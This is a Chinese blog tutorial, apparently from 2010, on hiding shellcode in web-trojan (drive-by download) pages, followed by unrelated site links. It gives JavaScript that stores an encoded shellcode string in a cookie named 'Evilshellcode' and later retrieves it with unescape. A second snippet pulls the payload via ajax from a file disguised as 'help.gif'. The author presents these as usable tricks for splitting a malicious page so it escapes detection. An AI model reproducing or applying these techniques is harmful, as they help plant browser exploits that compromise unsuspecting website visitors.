一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
javascript 手动给表增加数据的小例子
Jul 10 Javascript
JavaScript判断密码强度(自写代码)
Sep 06 Javascript
自动设置iframe大小的jQuery代码
Sep 11 Javascript
基于javascript实现最简单的选项卡切换效果
May 16 Javascript
JavaScript实现垂直滚动条效果
Jan 18 Javascript
angularjs实现的前端分页控件示例
Feb 10 Javascript
socket.io学习教程之基础介绍(一)
Apr 29 Javascript
jquery实现图片放大点击切换
Jun 06 jQuery
js实现动态改变radio状态的方法
Feb 28 Javascript
五分钟搞懂Vuex实用知识(小结)
Aug 12 Javascript
vue实现图片上传预览功能
Dec 23 Javascript
使用node-media-server搭建一个简易的流媒体服务器
Jan 20 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
微信access_token的获取开发示例
2015/04/16 PHP
JavaScript constructor和instanceof,JSOO中的一对欢喜冤家
2009/05/25 Javascript
6款新颖的jQuery和CSS3进度条插件推荐
2013/03/05 Javascript
JQUERY dialog的用法详细解析
2013/12/19 Javascript
iframe里的页面禁止右键事件的方法
2014/06/10 Javascript
javascript在IE下trim函数无法使用的解决方法
2014/09/12 Javascript
JS+CSS实现六级网站导航主菜单效果
2015/09/28 Javascript
基于jquery animate操作css样式属性小结
2015/11/27 Javascript
jQuery实现模仿微博下拉滚动条加载数据效果
2015/12/25 Javascript
jQuery Ajax Post 回调函数不执行问题的解决方法
2016/08/15 Javascript
ES6扩展运算符用法实例分析
2017/10/31 Javascript
2020京东618叠蛋糕js脚本(亲测好用)
2020/06/02 Javascript
Python中实现结构相似的函数调用方法
2015/03/10 Python
Python配置文件解析模块ConfigParser使用实例
2015/04/13 Python
Python环境下搭建属于自己的pip源的教程
2016/05/05 Python
Python3.6正式版新特性预览
2016/12/15 Python
Python正确重载运算符的方法示例详解
2017/08/27 Python
python+matplotlib实现鼠标移动三角形高亮及索引显示
2018/01/15 Python
详解python函数传参是传值还是传引用
2018/01/16 Python
用Python写一段用户登录的程序代码
2018/04/22 Python
利用selenium爬虫抓取数据的基础教程
2019/06/10 Python
python使用 __init__初始化操作简单示例
2019/09/26 Python
Html5新特性用canvas标签画多条直线附效果截图
2014/06/30 HTML / CSS
ruby如何进行集成操作?Ruby能进行多重继承吗?
2013/10/16 面试题
大学毕业生工作的自我评价
2013/10/01 职场文书
大学毕业生自我鉴定
2013/11/05 职场文书
广告学专业推荐信范文
2013/11/23 职场文书
仓库理货员岗位职责
2013/12/18 职场文书
应届电子商务毕业自荐书范文
2014/02/11 职场文书
婚礼主持词开场白
2014/03/13 职场文书
环保倡议书50字
2014/05/15 职场文书
项目战略合作意向书
2015/05/08 职场文书
离开雷锋的日子观后感
2015/06/09 职场文书
功夫熊猫观后感
2015/06/10 职场文书
终止解除劳动合同证明书
2015/06/17 职场文书
Nginx文件已经存在全局反向代理问题排查记录
2022/07/15 Servers